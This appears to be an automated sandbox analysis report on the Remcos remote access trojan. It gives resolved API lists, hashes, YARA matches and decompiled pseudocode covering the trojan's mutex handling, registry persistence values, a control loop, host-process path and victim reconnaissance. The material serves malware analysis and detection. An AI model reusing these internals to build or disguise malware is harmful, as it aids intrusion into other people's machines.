                              • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 0040D0BD
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D0C0
                              • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 0040D0DA
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D0DD
                              • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040D0EE
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D0F1
                              • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040D102
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D105
                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040D116
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D119
                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 0040D12A
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D12D
                              • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin), ref: 0040D13E
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D141
                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 0040D152
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D155
                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 0040D166
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D169
                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 0040D17A
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D17D
                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 0040D18E
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D191
                              • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040D19F
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D1A2
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Similarity
                              • API ID: AddressProc$HandleModule$LibraryLoad
                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$Remcos-8VTGWT$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
                              • API String ID: 551388010-3342178377
                              • Opcode ID: ee77730f3c10e163074c29ba8ff803cc8afef09899e29833192295e4fdf7bb44
                              • Instruction ID: 029b01f258c961e34356c9f3640987a8bc8548ac7ec401a199099fba32c80220
                              • Opcode Fuzzy Hash: ee77730f3c10e163074c29ba8ff803cc8afef09899e29833192295e4fdf7bb44
                              • Instruction Fuzzy Hash: 10218EA0E8035875DA20BBB66C4DE1B2E58DA84B957214C27F205D7191FBFCC5408FAF
                              Uniqueness Score: -1.00%

                              C-Code - Quality: 46%
                              			E0040D455() {
                              				// Control loop: every 3 s it reads the registry value "override" under HKCU
                              				// (key name held at 0x46c518) and branches on it; the branches below rewrite
                              				// a value named "pth_unenc" and store the build string "3.1.5 Pro" under "v".
                              				signed int _v32;
                              				void* _t13;
                              				void* _t22;
                              				signed int _t61;
                              				void* _t63;
                              				void* _t64;
                              				void* _t66;
                              
                              				_t63 = (_t61 & 0xfffffff8) - 0x20;
                              				while(1) {
                              					_v32 = _v32 & 0x00000000;
                              					_t52 = L00401F75(0x46c518);
                              					E00410275(_t10, "override",  &_v32); // RegOpenKeyExA + RegQueryValueExA, see the subcalls listed below
                              					_t13 = _v32 - 1;
                              					if(_t13 == 0) { // override == 1: rewrite the values, keep polling
                              						goto L5;
                              					}
                              					_t22 = _t13 - 1;
                              					if(_t22 == 0) { // override == 2: rewrite the values, then exit
                              						_push(1);
                              						_t67 = _t63 - 0x18;
                              						E00407352(0x46c500, _t63 - 0x18, _t52, __eflags, 0x46c500);
                              						_push(L"pth_unenc");
                              						L0041053C(0x80000001, L00401ECB(L00416C32( &_v32, 0x46c518))); // 0x80000001 == HKEY_CURRENT_USER
                              						L00401ED0();
                              						_push(1);
                              						E00402064(0x46c500, _t67 + 0x20 - 0x18, "3.1.5 Pro");
                              						_push("v");
                              						E00410497(0x46c518, L00401F75(0x46c518));
                              						L0040FB4B();
                              						ExitProcess(0);
                              					}
                              					_t74 = _t22 != 1;
                              					if(_t22 != 1) { // any other value: sleep and poll again
                              						L6:
                              						Sleep(0xbb8); // executed; 0xbb8 == 3000 ms
                              						continue;
                              					}
                              					E0040B107(); // override == 3: run E0040B107 first, then fall into the rewrite
                              					L5:
                              					_push(1);
                              					_t64 = _t63 - 0x18;
                              					E00407352(0x46c500, _t64, _t52, _t74, 0x46c500);
                              					_push(L"pth_unenc");
                              					L0041053C(0x80000001, L00401ECB(L00416C32( &_v32, 0x46c518))); // HKEY_CURRENT_USER
                              					L00401ED0();
                              					_push(1);
                              					_t66 = _t64 + 0x20 - 0x18;
                              					E00402064(0x46c500, _t66, "3.1.5 Pro");
                              					_push("v");
                              					E00410497(0x46c518, L00401F75(0x46c518));
                              					_t63 = _t66 + 0x20;
                              					goto L6;
                              				}
                              			}










                              Instruction addresses, one per decompiled line in order (0x00000000 marks lines with no instruction of their own): 0x0040d45b 0x0040d46a 0x0040d46a 0x0040d480 0x0040d482 0x0040d48d 0x0040d490 0x00000000 0x00000000 0x0040d492 0x0040d495 0x0040d514 0x0040d516 0x0040d51c 0x0040d521 0x0040d53f 0x0040d54b 0x0040d550 0x0040d55c 0x0040d561 0x0040d56f 0x0040d577 0x0040d57e 0x0040d57e 0x0040d497 0x0040d49a 0x0040d504 0x0040d509 0x00000000 0x0040d509 0x0040d49c 0x0040d4a1 0x0040d4a1 0x0040d4a3 0x0040d4a9 0x0040d4ae 0x0040d4cc 0x0040d4d8 0x0040d4dd 0x0040d4df 0x0040d4e9 0x0040d4ee 0x0040d4fc 0x0040d501 0x00000000 0x0040d501

                              APIs
                                • Part of subcall function 00410275: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00410295
                                • Part of subcall function 00410275: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,0046C518), ref: 004102B3
                                • Part of subcall function 00410275: RegCloseKey.ADVAPI32(?), ref: 004102BE
                              • Sleep.KERNELBASE(00000BB8), ref: 0040D509
                              • ExitProcess.KERNEL32 ref: 0040D57E
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Similarity
                              • API ID: CloseExitOpenProcessQuerySleepValue
                              • String ID: 3.1.5 Pro$override$pth_unenc
                              • API String ID: 2281282204-3883831071
                              • Opcode ID: 29420b97a785fce57d285b6ed9cf5307563a7d9f490bfda752ec87826d6889d0
                              • Instruction ID: c40a5223718f3a957b604b9da94b8c1faed2f64ca342b4f7b91d7ee91612d3b8
                              • Opcode Fuzzy Hash: 29420b97a785fce57d285b6ed9cf5307563a7d9f490bfda752ec87826d6889d0
                              • Instruction Fuzzy Hash: F221F371F4030027D608BAB68D57B6E3556ABC0718F50443EF9026B2D2FEBD9A44879F
                              Uniqueness Score: -1.00%

                              C-Code - Quality: 82%
                              			E004166F6(void* __ecx, void* __edi, void* __eflags) {
                              				char _v8;
                              				long _v12;
                              				char _v36;
                              				char _v60;
                              				char _v92;
                              				short _v604;
                              				void* _t26;
                              				void* _t38;
                              				void* _t39;
                              
                              				_t39 = __eflags;
                              				_v8 = 0x10;
                              				_t38 = __ecx;
                              				 *0x46beb0(1,  &_v92,  &_v8);
                              				_v12 = 0x100;
                              				GetUserNameW( &_v604,  &_v12); // executed
                              				E00403086(_t26, _t38, E004043E5(_t26,  &_v36,  &_v92, _t39, E0040425F(_t26,  &_v60, "/")), __edi, _t39,  &_v604);
                              				L00401ED0();
                              				L00401ED0();
                              				return _t38;
                              			}

                              0x004166f6
                              0x00416703
                              0x0041670e
                              0x00416713
                              0x0041671c
                              0x0041672b
                              0x00416756
                              0x0041675f
                              0x00416767
                              0x00416772

                              APIs
                              • GetComputerNameExW.KERNEL32(00000001,?,?,0046C578), ref: 00416713
                              • GetUserNameW.ADVAPI32(?,00000028), ref: 0041672B
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Name$ComputerUser
                              • String ID:
                              • API String ID: 4229901323-0
                              • Opcode ID: a0a78a95647ba6d33f124e1c227be0da667ae1d808a1bc5b8e78583460369bcc
                              • Instruction ID: 2614f2d36f30314c3128fc669825ed4f87fcc606c6fc04f15beb21360d1ce151
                              • Opcode Fuzzy Hash: a0a78a95647ba6d33f124e1c227be0da667ae1d808a1bc5b8e78583460369bcc
                              • Instruction Fuzzy Hash: E201FB7290021CABCB14EBD1DC45AEEB77CEF44305F10016AF905B31A5EEB46B898BD9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0042F1CD() {
                              				_Unknown_base(*)()* _t1;
                              
                              				_t1 = SetUnhandledExceptionFilter(E0042F1D9); // executed
                              				return _t1;
                              			}

                              0x0042f1d2
                              0x0042f1d8

                              APIs
                              • SetUnhandledExceptionFilter.KERNELBASE(Function_0002F1D9,0042EF00), ref: 0042F1D2
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 229e7487e4b619eafed6bfeacb774be22e42fe1f315c3811e96dc54caa77ac2a
                              • Instruction ID: cbbfc4c934c794425517924e3dd5babbab0d2174eef7e37b5e0b749d7271a00e
                              • Opcode Fuzzy Hash: 229e7487e4b619eafed6bfeacb774be22e42fe1f315c3811e96dc54caa77ac2a
                              • Instruction Fuzzy Hash:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 89%
                              			E0040C641(void* __edx, void* __eflags, char* _a12) {
                              				char _v524;
                              				char _v700;
                              				char _v720;
                              				char _v724;
                              				char _v728;
                              				char _v744;
                              				char _v756;
                              				char _v760;
                              				char _v772;
                              				struct _SECURITY_ATTRIBUTES* _v776;
                              				signed int _v780;
                              				char _v784;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				void* _t69;
                              				void* _t76;
                              				void** _t83;
                              				void* _t87;
                              				CHAR* _t90;
                              				long _t92;
                              				int _t94;
                              				char _t97;
                              				void* _t98;
                              				void* _t102;
                              				void* _t118;
                              				void* _t119;
                              				char _t127;
                              				char* _t129;
                              				signed char* _t131;
                              				signed char* _t133;
                              				void* _t136;
                              				void* _t138;
                              				void* _t152;
                              				void* _t155;
                              				intOrPtr _t157;
                              				void* _t158;
                              				CHAR* _t174;
                              				intOrPtr* _t177;
                              				void* _t179;
                              				void* _t185;
                              				char* _t188;
                              				void* _t191;
                              				char* _t195;
                              				void* _t202;
                              				signed short* _t206;
                              				void* _t207;
                              				void* _t208;
                              				signed int _t209;
                              				void* _t215;
                              				CHAR* _t221;
                              				void* _t223;
                              				char* _t226;
                              				char* _t228;
                              				intOrPtr* _t230;
                              				void* _t232;
                              				intOrPtr* _t237;
                              				intOrPtr* _t241;
                              				void* _t243;
                              				void* _t251;
                              				void* _t262;
                              				void* _t265;
                              				struct _SECURITY_ATTRIBUTES* _t266;
                              				int _t269;
                              				char* _t352;
                              				signed int _t374;
                              				signed int _t378;
                              				int _t380;
                              				signed int _t386;
                              				signed int _t389;
                              				intOrPtr _t419;
                              				void* _t429;
                              				void* _t431;
                              				signed int _t447;
                              				void* _t450;
                              				char* _t457;
                              				void* _t458;
                              				char* _t461;
                              				void* _t463;
                              				void* _t468;
                              				char* _t473;
                              				intOrPtr* _t477;
                              				void* _t480;
                              				void* _t481;
                              				void* _t482;
                              				signed int _t488;
                              				void* _t491;
                              				void* _t492;
                              				void* _t493;
                              				void* _t495;
                              				void* _t501;
                              				void* _t502;
                              
                              				_t440 = __edx;
                              				_push(_t265);
                              				L0040CFBE( &_v724, __edx, __eflags);
                              				_t491 = (_t488 & 0xfffffff8) - 0x2f4;
                              				E004020CC(_t265, _t491, __edx, __eflags, 0x46c59c);
                              				_t492 = _t491 - 0x18;
                              				E004020CC(_t265, _t492, __edx, __eflags,  &_v728);
                              				_t69 = L00416DD0( &_v756, __edx);
                              				_t493 = _t492 + 0x30;
                              				L0040D7F8(__edx, _t69);
                              				L00401E54( &_v760, __edx);
                              				_t281 = _a12;
                              				if( *_a12 != 0x2d) {
                              					L6:
                              					_t457 = 0x46c578;
                              					__eflags =  *((char*)(L00401F75(L00401E29(0x46c578, _t440, __eflags, 3))));
                              					 *0x46bb05 = __eflags != 0;
                              					_t76 = E0040530D(_t265,  &_v756, L004075E8( &_v780, "Software\\", __eflags, L00401E29(0x46c578, _t440, __eflags, 0xe)), 0x46c578, __eflags, 0x45f6c4);
                              					_t467 = 0x46c518;
                              					L00401FB1(0x46c518, _t75, 0x46c518, _t76);
                              					L00401FA7();
                              					L00401FA7();
                              					_t266 = 0;
                              					L00401E29(0x46c578, _t75, __eflags, 0x32);
                              					__eflags =  *(E004051EA(0));
                              					 *0x46bd4e = __eflags != 0;
                              					L00401E29(0x46c578, _t75, __eflags, 0x33);
                              					_t83 = E004051EA(0);
                              					__eflags =  *_t83;
                              					 *0x46bd4f =  *_t83 != 0;
                              					__eflags =  *0x46bd4e - _t266; // 0x0
                              					if(__eflags == 0) {
                              						L8:
                              						_v776 = _t266;
                              						_t468 = OpenMutexA(0x100000, _t266, "Remcos_Mutex_Inj");
                              						__eflags = _t468;
                              						if(_t468 != 0) {
                              							WaitForSingleObject(_t468, 0xea60);
                              							CloseHandle(_t468);
                              						}
                              						_t443 = L00401F75(0x46c518); // executed
                              						_t87 = E00410275(_t86, "Inj",  &_v776); // executed
                              						__eflags = _t87;
                              						if(__eflags != 0) {
                              							_t443 = L00401F75(0x46c518);
                              							L004106D2(_t256, __eflags, "Inj");
                              						}
                              						L00401F8D(0x46c548, L00401E29(_t457, _t443, __eflags, 0xe));
                              						_t90 = L00401F75(0x46c548);
                              						_t458 = 0;
                              						_t269 = 1;
                              						CreateMutexA(0, 1, _t90); // executed
                              						_t92 = GetLastError();
                              						__eflags = _t92 - 0xb7;
                              						if(_t92 == 0xb7) {
                              							L45:
                              							L00401FA7();
                              							_t94 = _t269;
                              							goto L5;
                              						} else {
                              							E0040D072();
                              							GetModuleFileNameW(0, "C:\Windows\SysWOW64\mobsync.exe", 0x104);
                              							_t97 = L00416F6C(0x46c548);
                              							_push(0x46c548);
                              							_t444 = 0x80000002;
                              							 *0x46beb4 = _t97;
                              							_t98 = E004102D2( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName");
                              							_t495 = _t493 + 0xc;
                              							L00401FB1(0x46c5b4, 0x80000002, 0x46c5b4, _t98);
                              							L00401FA7();
                              							__eflags =  *0x46beb4;
                              							if( *0x46beb4 == 0) {
                              								_push(" (32 bit)");
                              							} else {
                              								_push(" (64 bit)");
                              							}
                              							L004059B5(_t269, 0x46c5b4, _t458);
                              							_t102 =  *0x46bd24;
                              							__eflags = _t102;
                              							if(_t102 != 0) {
                              								 *0x46a9d0 =  *_t102();
                              							}
                              							_t473 = 0x46c578;
                              							__eflags = _v776 - _t458;
                              							if(__eflags == 0) {
                              								_t429 = L00401E29(0x46c578, _t444, __eflags, 0x2e);
                              								__eflags =  *((char*)(L00401F75(_t429)));
                              								if(__eflags != 0) {
                              									__eflags =  *0x46bd24 - _t458; // 0x7536e630
                              									if(__eflags != 0) {
                              										__eflags =  *0x46a9d0 - _t458; // 0x1
                              										if(__eflags == 0) {
                              											_t444 = L00401F75(0x46c518);
                              											_t251 = E0041022B(0x46c518, _t250, "origmsc");
                              											_pop(_t431);
                              											__eflags = _t251;
                              											if(__eflags == 0) {
                              												L00405F2A(_t269, _t431, _t444);
                              											}
                              										} else {
                              											_push(_t429);
                              											_push(_t429);
                              											__eflags = L0040AAB0() - 0xffffffff;
                              											if(__eflags == 0) {
                              												E00406024(__eflags);
                              											}
                              										}
                              									}
                              								}
                              							}
                              							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 0x27))));
                              							if(__eflags != 0) {
                              								L0040D797();
                              							}
                              							L00409DCB(_t269, 0x46c4e8, L00401F75(L00401E29(_t473, _t444, __eflags, 0xb)));
                              							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 4))));
                              							 *0x46bb06 = __eflags != 0;
                              							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 5))));
                              							 *0x46baff = __eflags != 0;
                              							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 8))));
                              							 *0x46bb04 = __eflags != 0;
                              							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 3))));
                              							if(__eflags != 0) {
                              								_t237 = L00401F75(L00401E29(_t473, _t444, __eflags, 0x30));
                              								_t24 = _t237 + 2; // 0x2
                              								_t444 = _t24;
                              								do {
                              									_t419 =  *_t237;
                              									_t237 = _t237 + 2;
                              									__eflags = _t419 - _t458;
                              								} while (_t419 != _t458);
                              								__eflags = _t237 - _t444;
                              								if(__eflags != 0) {
                              									_t241 = L00401F75(L00401E29(_t473, _t444, __eflags, 9));
                              									_t243 = L00401F75(L00401E29(0x46c578, _t444, __eflags, 0x30));
                              									_t444 =  *_t241;
                              									L00401EDA(0x46c530,  *_t241, _t241, E004179B3( &_v780,  *_t241, _t243));
                              									L00401ED0();
                              									_t473 = 0x46c578;
                              								}
                              							}
                              							__eflags = _v776 - _t458;
                              							if(_v776 != _t458) {
                              								L00431810(_t458,  &_v524, _t458, 0x208);
                              								_t118 = L00402469();
                              								_t119 = L00401F75(0x46c560);
                              								_t445 = L00401F75(0x46c518);
                              								L00410420(_t121, "exepath",  &_v524, 0x208, _t119, _t118);
                              								_t493 = _t495 + 0x20;
                              								L00409DCB(_t269, 0x46c500,  &_v524);
                              								_t461 = 0x46c578;
                              								goto L47;
                              							} else {
                              								__eflags =  *0x46bb05;
                              								if(__eflags == 0) {
                              									L00409DCB(_t269, 0x46c500, "C:\Windows\SysWOW64\mobsync.exe");
                              								} else {
                              									_t226 = L00401F75(L00401E29(_t473, _t444, __eflags, 0x1e));
                              									_t228 = L00401F75(L00401E29(_t473, _t444, __eflags, 0xc));
                              									_t230 = L00401F75(L00401E29(0x46c578, _t444, __eflags, 9));
                              									__eflags =  *_t226;
                              									__eflags =  *_t228;
                              									_t473 = 0x46c578;
                              									_t232 = L00401F75(L00401E29(0x46c578, _t444,  *_t228, 0xa));
                              									L0040AD0A( *_t230, L00401F75(L00401E29(0x46c578, _t444, __eflags, 0x30)), _t232, ((_t229 & 0xffffff00 |  *_t226 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t229 & 0xffffff00 |  *_t226 != 0x00000000) & 0x000000ff);
                              									_t495 = _t495 + 0xc;
                              									_t269 = 1;
                              									_t458 = 0;
                              								}
                              								_t202 = L00402469();
                              								_t447 = 2;
                              								_t386 =  ~(0 | __eflags > 0x00000000) | (_t202 + 0x00000001) * _t447;
                              								_push(_t386);
                              								_v780 = _t386;
                              								_t482 = L0042EE1E(_t386, (_t202 + 1) * _t447 >> 0x20, _t473, __eflags);
                              								__eflags = _t482;
                              								if(_t482 == 0) {
                              									_t482 = _t458;
                              								} else {
                              									L00431810(_t458, _t482, _t458, _v780);
                              									_t495 = _t495 + 0xc;
                              								}
                              								_t206 = L00401ECB(0x46c500);
                              								_t450 = _t482 - _t206;
                              								__eflags = _t450;
                              								_t463 = 2;
                              								do {
                              									_t389 =  *_t206 & 0x0000ffff;
                              									 *(_t206 + _t450) = _t389;
                              									_t206 = _t206 + _t463;
                              									__eflags = _t389;
                              								} while (_t389 != 0);
                              								_push(_t389);
                              								_t207 = L00402469();
                              								_t208 = L00401F75(0x46c560);
                              								_t209 = L00402469();
                              								E00410670(L00401F75(0x46c518), __eflags, "exepath", _t482, 2 + _t209 * 2, _t208, _t207); // executed
                              								L0042EE27(_t482);
                              								_t461 = 0x46c578;
                              								_push(_t269);
                              								_t215 = L00401F75(L00401E29(0x46c578, _t211, __eflags, 0x34));
                              								_t501 = _t495 + 0x1c - 0x18;
                              								E00402064(_t269, _t501, _t215);
                              								_push("licence");
                              								E00410497(0x46c518, L00401F75(0x46c518)); // executed
                              								_t493 = _t501 + 0x20;
                              								L00401E29(0x46c578, _t217, __eflags, 0xd);
                              								_t445 = "0";
                              								__eflags = L0040EE79(__eflags);
                              								if(__eflags == 0) {
                              									L47:
                              									_t127 = E00436079(_t125, L00401F75(L00401E29(_t461, _t445, __eflags, 0x28)));
                              									 *0x46bb07 = _t127;
                              									__eflags = _t127 - 2;
                              									if(_t127 != 2) {
                              										__eflags = _t127 - _t269;
                              										if(__eflags == 0) {
                              											_t380 = 0;
                              											__eflags = 0;
                              											goto L51;
                              										}
                              									} else {
                              										_t380 = _t269;
                              										L51:
                              										L004188B1(_t269, _t380, _t445);
                              										__eflags = 0;
                              										CreateThread(0, 0,  &M00418680, 0, 0, 0);
                              									}
                              									_t129 = L00401F75(L00401E29(_t461, _t445, __eflags, 0x37));
                              									_t131 = L00401F75(L00401E29(_t461, _t445, __eflags, 0x10));
                              									_t133 = L00401F75(L00401E29(_t461, _t445, __eflags, 0xf));
                              									__eflags =  *_t129;
                              									_t467 = 0x46c578;
                              									_t136 = E00436079(_t134, L00401F75(L00401E29(0x46c578, _t445,  *_t129, 0x36)));
                              									_t138 = L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x11));
                              									E0040846F(_t131,  *_t133 & 0x000000ff,  *_t131 & 0x000000ff, L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x31)), _t138, _t136, (_t132 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff); // executed
                              									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x14)))) - 1;
                              									if(__eflags != 0) {
                              										_t457 = CreateThread;
                              									} else {
                              										_t191 = 2;
                              										_t481 = L0042EB70(_t445, 0x46c578, __eflags, _t191);
                              										 *_t481 = 0;
                              										_t378 = L00401E29(0x46c578, _t445, __eflags, 0x35);
                              										_t195 = L00401F75(_t378);
                              										_t457 = CreateThread;
                              										__eflags =  *_t195;
                              										 *((char*)(_t481 + 1)) = _t378 & 0xffffff00 | __eflags != 0x00000000;
                              										CreateThread(0, 0, E004152D7, _t481, 0, 0);
                              										_t467 = 0x46c578;
                              									}
                              									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(_t467, _t445, __eflags, 0x16)))) - 1;
                              									if(__eflags == 0) {
                              										_t185 = 2;
                              										_t480 = L0042EB70(_t445, _t467, __eflags, _t185);
                              										 *_t480 = 1;
                              										_t374 = L00401E29(0x46c578, _t445, __eflags, 0x35);
                              										_t188 = L00401F75(_t374);
                              										__eflags =  *_t188;
                              										__eflags = 0;
                              										 *((char*)(_t480 + 1)) = _t374 & 0xffffff00 |  *_t188 != 0x00000000;
                              										CreateThread(0, 0, E004152D7, _t480, 0, 0);
                              										_t467 = 0x46c578;
                              									}
                              									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(_t467, _t445, __eflags, 0x23)))) - 1;
                              									if(__eflags == 0) {
                              										 *0x46ba75 = 1;
                              										_t177 = L00401F75(L00401E29(_t467, _t445, __eflags, 0x25));
                              										_t179 = L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x26));
                              										_t445 =  *_t177;
                              										L00401EDA(0x46c0e0,  *_t177, _t177, L00417967( &_v780,  *_t177, _t179));
                              										L00401ED0();
                              										__eflags = 0;
                              										CreateThread(0, 0, 0x401bad, 0, 0, 0);
                              										_t467 = 0x46c578;
                              									}
                              									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(_t467, _t445, __eflags, 0x2b)))) - 1;
                              									if(__eflags == 0) {
                              										_t467 = L00401F75(L00401E29(_t467, _t445, __eflags, 0x2c));
                              										_t174 = E00436079(_t172, L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x2d)));
                              										__eflags =  *_t467;
                              										_t445 = _t174;
                              										__eflags =  *_t467 != 0;
                              										L0040AA16(_t174);
                              									}
                              									_t152 = E004166F6( &_v772, _t457, __eflags); // executed
                              									L00401EDA(0x46c584, _t445, _t467, _t152);
                              									_t352 =  &_v776;
                              									L00401ED0();
                              									_t155 =  *0x46bd18;
                              									_t266 = 0;
                              									__eflags = _t155;
                              									if(_t155 != 0) {
                              										 *_t155(0); // executed
                              									}
                              									CreateThread(_t266, _t266, E0040D455, _t266, _t266, _t266); // executed
                              									__eflags =  *0x46bd4e;
                              									if( *0x46bd4e != 0) {
                              										CreateThread(_t266, _t266, 0x40f4b7, _t266, _t266, _t266);
                              									}
                              									__eflags =  *0x46bd4f;
                              									if( *0x46bd4f != 0) {
                              										CreateThread(_t266, _t266, 0x40f9d5, _t266, _t266, _t266);
                              									}
                              									_t157 =  *0x46a9d0; // 0x1
                              									_t158 = _t157 - _t266;
                              									__eflags = _t158;
                              									if(__eflags == 0) {
                              										goto L71;
                              									} else {
                              										__eflags = _t158 - 1;
                              										if(__eflags == 0) {
                              											_push("Administrator");
                              											goto L72;
                              										}
                              									}
                              									goto L73;
                              								} else {
                              									_t221 = L00401E29(0x46c578, "0", __eflags, 0xd);
                              									_t502 = _t493 - 0x18;
                              									_t445 = _t221;
                              									L00416C32(_t502, _t221);
                              									_t223 = E0040D1AD(__eflags);
                              									_t493 = _t502 + 0x18;
                              									__eflags = _t223 - _t269;
                              									if(__eflags != 0) {
                              										goto L47;
                              									} else {
                              										_t269 = 3;
                              										goto L45;
                              									}
                              								}
                              							}
                              						}
                              					} else {
                              						_v780 = 0;
                              						_t262 = E00410275(L00401F75(0x46c518), "WD",  &_v780);
                              						__eflags = _t262;
                              						if(_t262 != 0) {
                              							L004106D2(L00401F75(0x46c518), __eflags, "WD");
                              							L0040F785();
                              							L71:
                              							_push("User");
                              							L72:
                              							L004075C4(_t266, _t493 - 0x18, "Access level: ", _t457, __eflags, E00402064(_t266,  &_v776));
                              							E00402064(_t266, _t493 - 4, "[Info]");
                              							L004165D8(_t266, _t457);
                              							_t352 =  &_v784;
                              							L00401FA7(); // executed
                              							L73:
                              							E00411319(); // executed
                              							asm("int3");
                              							_push(_t467);
                              							_t477 = _t352 + 0x68;
                              							L0040D8B5(_t266, _t477, _t477);
                              							_t281 = _t477;
                              							 *_t281 = 0x4607a0;
                              							 *_t281 = 0x46075c;
                              							return L0042FE13(_t281);
                              						} else {
                              							goto L8;
                              						}
                              					}
                              				} else {
                              					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
                              					if(__eflags != 0) {
                              						goto L6;
                              					} else {
                              						__eax =  *(__ecx + 2) & 0x000000ff;
                              						__eflags = __al;
                              						if(__eflags != 0) {
                              							goto L6;
                              						} else {
                              							_push(__ecx);
                              							_push(__ecx);
                              							__ecx =  &_v700;
                              							__eax = L0040D8E4( &_v700, __edx, __eflags, "licence_code.txt", 2);
                              							__ecx = 0x46c578;
                              							__ecx = L00401E29(0x46c578, __edx, __eflags, 0x34);
                              							__edx = __eax;
                              							__ecx =  &_v720;
                              							__eax = L0040EC5B( &_v720, __edx, __eflags);
                              							__ecx =  &_v720;
                              							__eax = L0040D895( &_v720, __edx, __eflags);
                              							__ecx =  &_v720;
                              							L74();
                              							__ecx =  &_v744;
                              							L00401FA7() = 0;
                              							__eax = 1;
                              							__eflags = 1;
                              							L5:
                              							return _t94;
                              						}
                              					}
                              				}
                              			}
                              Instruction address column for the decompiled function above (0x0040c641 through 0x0040c6fc; the per-address instruction text is not present in this extract)

                              APIs
                              • OpenMutexA.KERNEL32 ref: 0040C7DA
                              • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0040C7EC
                              • CloseHandle.KERNEL32(00000000), ref: 0040C7F3
                              • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,0000000E), ref: 0040C852
                              • GetLastError.KERNEL32 ref: 0040C858
                              • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\mobsync.exe,00000104), ref: 0040C879
                                • Part of subcall function 0040EC5B: __EH_prolog.LIBCMT ref: 0040EC60
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Mutex$CloseCreateErrorFileH_prologHandleLastModuleNameObjectOpenSingleWait
                              • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Windows\SysWOW64\mobsync.exe$Inj$ProductName$Remcos$Remcos-8VTGWT$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$User$[Info]$exepath$licence$licence_code.txt$origmsc
                              • API String ID: 1247502528-929690764
                              • Opcode ID: 1756edb8d8676bbec70d225e95beccb275aa19672e5e980b2ada83bd84d92b62
                              • Instruction ID: 42bfda91432e7fc4dea79f371f9b9f268822a4ed28c20108b284d7b9b352ec02
